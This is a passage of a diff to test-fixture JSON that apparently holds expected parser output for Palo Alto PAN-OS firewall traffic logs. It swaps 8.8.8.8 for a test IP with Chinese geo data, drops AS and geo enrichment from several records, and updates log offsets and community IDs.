-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.71.117.196",
         "destination.nat.ip": "52.71.117.196",
         "destination.nat.port": 443,
@@ -3906,7 +3778,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 16297,
+        "log.offset": 16477,
         "network.application": "ssl",
         "network.bytes": 16594,
         "network.community_id": [
@@ -3980,17 +3852,18 @@
         "client.nat.port": 34994,
         "client.packets": 1,
         "client.port": 3018,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 244,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -4004,7 +3877,7 @@
         "event.end": "2018-11-30T16:09:12.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:12.000-02:00",
         "event.timezone": "-02:00",
@@ -4016,12 +3889,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 16802,
+        "log.offset": 16982,
         "network.application": "dns",
         "network.bytes": 323,
         "network.community_id": [
-            "1:b/0kdGUcINh0ryiR0w0QTg0t0jQ=",
-            "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo="
+            "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=",
+            "1:mWbN4QHKVTUC68wg5wKOivMQ8W8="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -4038,12 +3911,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24046",
-        "panw.panos.network.nat.community_id": "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=",
+        "panw.panos.network.nat.community_id": "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091148,
         "panw.panos.source.interface": "ethernet1/2",
@@ -4058,14 +3931,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 244,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -4090,17 +3963,18 @@
         "client.nat.port": 38064,
         "client.packets": 1,
         "client.port": 16569,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 205,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -4114,7 +3988,7 @@
         "event.end": "2018-11-30T16:09:12.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:12.000-02:00",
         "event.timezone": "-02:00",
@@ -4126,12 +4000,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 17250,
+        "log.offset": 17440,
         "network.application": "dns",
         "network.bytes": 300,
         "network.community_id": [
-            "1:SsNvr7qdck7W52PZqREypGPIglo=",
-            "1:uSrPYHIl4eJpdC+J0IAMuGStuNc="
+            "1:I02So92wktIGhyngyvODK1CjYE0=",
+            "1:MwQQDOUiYF37dHofLv1bDnJVK20="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -4148,12 +4022,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24196",
-        "panw.panos.network.nat.community_id": "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=",
+        "panw.panos.network.nat.community_id": "1:MwQQDOUiYF37dHofLv1bDnJVK20=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091149,
         "panw.panos.source.interface": "ethernet1/2",
@@ -4168,14 +4042,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 205,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -4201,17 +4075,7 @@
         "client.packets": 24,
         "client.port": 52479,
         "destination.address": "35.186.194.41",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 2302,
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "35.186.194.41",
         "destination.nat.ip": "35.186.194.41",
         "destination.nat.port": 443,
@@ -4239,7 +4103,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 17699,
+        "log.offset": 17899,
         "network.application": "ssl",
         "network.bytes": 6598,
         "network.community_id": [
@@ -4314,12 +4178,7 @@
         "client.packets": 63,
         "client.port": 52478,
         "destination.address": "35.201.124.9",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 6757,
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.location.lat": 35.0,
-        "destination.geo.location.lon": 105.0,
         "destination.ip": "35.201.124.9",
         "destination.nat.ip": "35.201.124.9",
         "destination.nat.port": 443,
@@ -4347,7 +4206,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 18185,
+        "log.offset": 18385,
         "network.application": "ssl",
         "network.bytes": 65588,
         "network.community_id": [
@@ -4422,17 +4281,7 @@
         "client.packets": 17,
         "client.port": 52502,
         "destination.address": "100.24.131.237",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 9007,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "100.24.131.237",
         "destination.nat.ip": "100.24.131.237",
         "destination.nat.port": 443,
@@ -4460,7 +4309,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 18678,
+        "log.offset": 18878,
         "network.application": "ssl",
         "network.bytes": 13076,
         "network.community_id": [
@@ -4535,14 +4384,7 @@
         "client.packets": 8,
         "client.port": 52458,
         "destination.address": "184.51.252.247",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
         "destination.bytes": 661,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "184.51.252.247",
         "destination.nat.ip": "184.51.252.247",
         "destination.nat.port": 443,
@@ -4570,7 +4412,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 19179,
+        "log.offset": 19379,
         "network.application": "ssl",
         "network.bytes": 1761,
         "network.community_id": [
@@ -4645,17 +4487,7 @@
         "client.packets": 15,
         "client.port": 52484,
         "destination.address": "35.190.88.148",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 11136,
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "35.190.88.148",
         "destination.nat.ip": "35.190.88.148",
         "destination.nat.port": 443,
@@ -4683,7 +4515,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 19683,
+        "log.offset": 19883,
         "network.application": "ssl",
         "network.bytes": 14732,
         "network.community_id": [
@@ -4758,17 +4590,7 @@
         "client.packets": 15,
         "client.port": 52482,
         "destination.address": "35.186.243.83",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 11136,
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "35.186.243.83",
         "destination.nat.ip": "35.186.243.83",
         "destination.nat.port": 443,
@@ -4796,7 +4618,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 20177,
+        "log.offset": 20377,
         "network.application": "ssl",
         "network.bytes": 14732,
         "network.community_id": [
@@ -4870,17 +4692,18 @@
         "client.nat.port": 16044,
         "client.packets": 1,
         "client.port": 33769,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 182,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -4894,7 +4717,7 @@
         "event.end": "2018-11-30T16:09:12.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:12.000-02:00",
         "event.timezone": "-02:00",
@@ -4906,12 +4729,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 20671,
+        "log.offset": 20871,
         "network.application": "dns",
         "network.bytes": 266,
         "network.community_id": [
-            "1:445AeHI1LAvb+ii4arRZeLAO4zM=",
-            "1:Y7iOj20be5Di4rx5iGHLO9k0YoU="
+            "1:2lliaquecBpJntSuQ7PijiL4QZk=",
+            "1:8KuHdx0uKJL3qlKce34DQ08Axak="
         ],
         "network.direction": "external",
         "network.packets": 2,
@@ -4928,12 +4751,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24198",
-        "panw.panos.network.nat.community_id": "1:445AeHI1LAvb+ii4arRZeLAO4zM=",
+        "panw.panos.network.nat.community_id": "1:8KuHdx0uKJL3qlKce34DQ08Axak=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091156,
         "panw.panos.source.interface": "ethernet1/2",
@@ -4948,14 +4771,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 182,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -4980,17 +4803,18 @@
         "client.nat.port": 56614,
         "client.packets": 1,
         "client.port": 14106,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 90,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -5004,7 +4828,7 @@
         "event.end": "2018-11-30T16:09:12.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:12.000-02:00",
         "event.timezone": "-02:00",
@@ -5016,12 +4840,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 21122,
+        "log.offset": 21332,
         "network.application": "dns",
         "network.bytes": 164,
         "network.community_id": [
-            "1:+5KwsEYW+tFecEENSBwHbKTvUv8=",
-            "1:8HlDMcJ2vfYtzQNW4/YDX7avDu8="
+            "1:2lDBZAbLgBaDEDnigTknsVKKmwI=",
+            "1:QACuXO9c1p5aQqviOZwhIBygbzg="
         ],
         "network.direction": "internal",
         "network.packets": 2,
@@ -5038,12 +4862,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "trust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24184",
-        "panw.panos.network.nat.community_id": "1:+5KwsEYW+tFecEENSBwHbKTvUv8=",
+        "panw.panos.network.nat.community_id": "1:QACuXO9c1p5aQqviOZwhIBygbzg=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091157,
         "panw.panos.source.interface": "ethernet1/2",
@@ -5058,14 +4882,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 90,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -5091,17 +4915,7 @@
         "client.packets": 17,
         "client.port": 52503,
         "destination.address": "100.24.165.74",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 6669,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "100.24.165.74",
         "destination.nat.ip": "100.24.165.74",
         "destination.nat.port": 443,
@@ -5129,7 +4943,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 21568,
+        "log.offset": 21788,
         "network.application": "ssl",
         "network.bytes": 9400,
         "network.community_id": [
@@ -5204,14 +5018,7 @@
         "client.packets": 8,
         "client.port": 52459,
         "destination.address": "184.51.252.247",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
         "destination.bytes": 661,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "184.51.252.247",
         "destination.nat.ip": "184.51.252.247",
         "destination.nat.port": 443,
@@ -5239,7 +5046,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 22066,
+        "log.offset": 22286,
         "network.application": "ssl",
         "network.bytes": 1761,
         "network.community_id": [
@@ -5314,12 +5121,7 @@
         "client.packets": 15,
         "client.port": 52483,
         "destination.address": "35.201.94.140",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 11136,
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.location.lat": 35.0,
-        "destination.geo.location.lon": 105.0,
         "destination.ip": "35.201.94.140",
         "destination.nat.ip": "35.201.94.140",
         "destination.nat.port": 443,
@@ -5347,7 +5149,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 22571,
+        "log.offset": 22791,
         "network.application": "ssl",
         "network.bytes": 14732,
         "network.community_id": [
@@ -5421,17 +5223,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -5445,7 +5248,7 @@
         "event.end": "2018-11-30T16:09:31.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:31.000-02:00",
         "event.timezone": "-02:00",
@@ -5457,12 +5260,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 23072,
+        "log.offset": 23292,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "unknown",
         "network.packets": 12,
@@ -5477,11 +5280,11 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24390",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091161,
         "panw.panos.source.interface": "ethernet1/2",
@@ -5495,14 +5298,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -5527,17 +5330,18 @@
         "client.nat.port": 61722,
         "client.packets": 1,
         "client.port": 38663,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 144,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
